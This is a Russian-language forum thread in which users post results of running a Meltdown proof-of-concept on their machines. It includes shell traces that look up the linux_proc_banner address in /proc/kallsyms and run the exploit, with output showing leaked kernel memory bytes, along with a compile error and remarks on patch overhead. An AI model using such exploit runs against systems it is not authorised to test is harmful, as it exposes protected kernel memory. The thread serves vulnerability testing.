LINUX.ORG.RU
4.14.11-1-ARCH
Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz
++ awk '/linux_proc_banner/ { print $1 }' /proc/kallsyms
+ linux_proc_banner=ffffffff91c00060
+ test ffffffff91c00060 = 0000000000000000
+ ./meltdown ffffffff91c00060 16
cached = 29, uncached = 322, threshold 96
ffffffff91c00060 =  0
ffffffff91c00061 =  0
ffffffff91c00062 =  0
ffffffff91c00063 =  0
ffffffff91c00064 =  0
ffffffff91c00065 =  0
ffffffff91c00066 =  0
ffffffff91c00067 =  0
ffffffff91c00068 =  0
ffffffff91c00069 =  0
ffffffff91c0006a =  0
ffffffff91c0006b =  0
ffffffff91c0006c =  0
ffffffff91c0006d =  0
ffffffff91c0006e =  0
ffffffff91c0006f =  0
ffffffff91c00070 =  0
ffffffff91c00071 =  0
ffffffff91c00072 =  0
ffffffff91c00073 =  0
ffffffff91c00074 =  0
ffffffff91c00075 =  0
Niroday ()
$ make
cc -march=native -mtune=native -O0   -c -o meltdown.o meltdown.c
meltdown.c: Assembler messages:
meltdown.c:45: Error: operand type mismatch for `ror'
make: *** [<встроенное>: meltdown.o] Ошибка 1

Так и должно быть?

dnb ()
4.9.0-4-amd64
Intel(R) Core(TM) i7-3687U CPU @ 2.10GHz
➜  meltdown-exploit git:(master) ✗ ./run.sh         
+ awk /linux_proc_banner/ { print $1 } /proc/kallsyms
+ linux_proc_banner=ffffffff8c200060
+ test ffffffff8c200060 = 0000000000000000
+ ./meltdown ffffffff8c200060 16
cached = 50, uncached = 185, threshold 96
ffffffff8c200060 = % 25
ffffffff8c200061 = s 73
ffffffff8c200062 =   20
ffffffff8c200063 = v 76
ffffffff8c200064 = e 65
ffffffff8c200065 = r 72
ffffffff8c200066 = s 73
ffffffff8c200067 = i 69
ffffffff8c200068 = o 6f
ffffffff8c200069 = n 6e
ffffffff8c20006a =   20
ffffffff8c20006b = % 25
ffffffff8c20006c = s 73
ffffffff8c20006d =   20
ffffffff8c20006e = ( 28
ffffffff8c20006f = d 64
ffffffff8c200070 = e 65
ffffffff8c200071 = b 62
ffffffff8c200072 = i 69
ffffffff8c200073 = a 61
ffffffff8c200074 = n 6e
ffffffff8c200075 = - 2d

Позже еще на паре машин могу запустить.

aquadon ★★ ()
4.4.0-105-generic (ubuntu 16.04.3)
Intel(R) Core(TM)2 Quad CPU    Q6600  @ 2.40GHz
$ ./run.sh
+ awk /linux_proc_banner/ { print $1 } /proc/kallsyms
+ linux_proc_banner=0000000000000000
+ test 0000000000000000 = 0000000000000000
+ sudo awk /linux_proc_banner/ { print $1 } /proc/kallsyms
+ linux_proc_banner=ffffffff81a00060
+ ./meltdown ffffffff81a00060 16
cached = 71, uncached = 364, threshold 160
ffffffff81a00060 =  0
ffffffff81a00061 =  0
ffffffff81a00062 =  0
    (и далее все нули)

HAVE_RDTSCP закомментил (не поддерживается)

anonymous ()

Абанту 17.10, ядро ещё не фикшеное, Intel i5-520M — работает.

Я вижу ты таки решил использовать sigaction и твой код работает. Я сначала тоже хотел оперировать сигналами, но потом попробовал переписать эксплоит, в котором использовались AES-инструкции. Только вместо AES-инструкций вставил busy-wait цикл. У меня не заработало.

utf8nowhere ()
Последнее исправление: utf8nowhere (всего исправлений: 1)
Ответ на: комментарий от davinchi

я в курсе про опции ядра. только пока мне этот патч не мешает. во всяком случае, на ноуте тормозов не заметно. i-7, 16 гигов рамы. в общем-то, обычные мои задачи ничем не затруднены. нагрузка на проц в среднем не возросла, кмк.

удивилась, что целерон неподвержен. видимо, он настолько древний.

Iron_Bug ★★ ()
Сб янв 13_06:48 $make       
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
Сб янв 13_06:48 $./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
++ find_linux_proc_banner /proc/kallsyms sudo
++ sudo sed -n -re 's/^([0-9a-f]*[1-9a-f][0-9a-f]*) .* linux_proc_banner$/\1/p' /proc/kallsyms
Пароль: 
+ linux_proc_banner=
+ set +x
not found. reading /boot/System.map-4.4.39-gentoo
+++ uname -r
++ find_linux_proc_banner /boot/System.map-4.4.39-gentoo sudo
++ sudo sed -n -re 's/^([0-9a-f]*[1-9a-f][0-9a-f]*) .* linux_proc_banner$/\1/p' /boot/System.map-4.4.39-gentoo
sed: невозможно прочитать /boot/System.map-4.4.39-gentoo: Нет такого файла или каталога
+ linux_proc_banner=
+ set +x
not found. reading /boot/System.map
++ find_linux_proc_banner /boot/System.map sudo
++ sudo sed -n -re 's/^([0-9a-f]*[1-9a-f][0-9a-f]*) .* linux_proc_banner$/\1/p' /boot/System.map
sed: невозможно прочитать /boot/System.map: Нет такого файла или каталога
+ linux_proc_banner=
+ set +x
can't find linux_proc_banner, unable to test at all

Не работает твой мега-эксплоит у меня.

И да

Сб янв 13_06:49 $uname -ra
Linux gentoo 4.4.39-gentoo #9 SMP Sat Dec 9 04:52:30 +06 2017 x86_64 Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz GenuineIntel GNU/Linux

RedEyedMan4 ★★★★★ ()
Последнее исправление: RedEyedMan4 (всего исправлений: 1)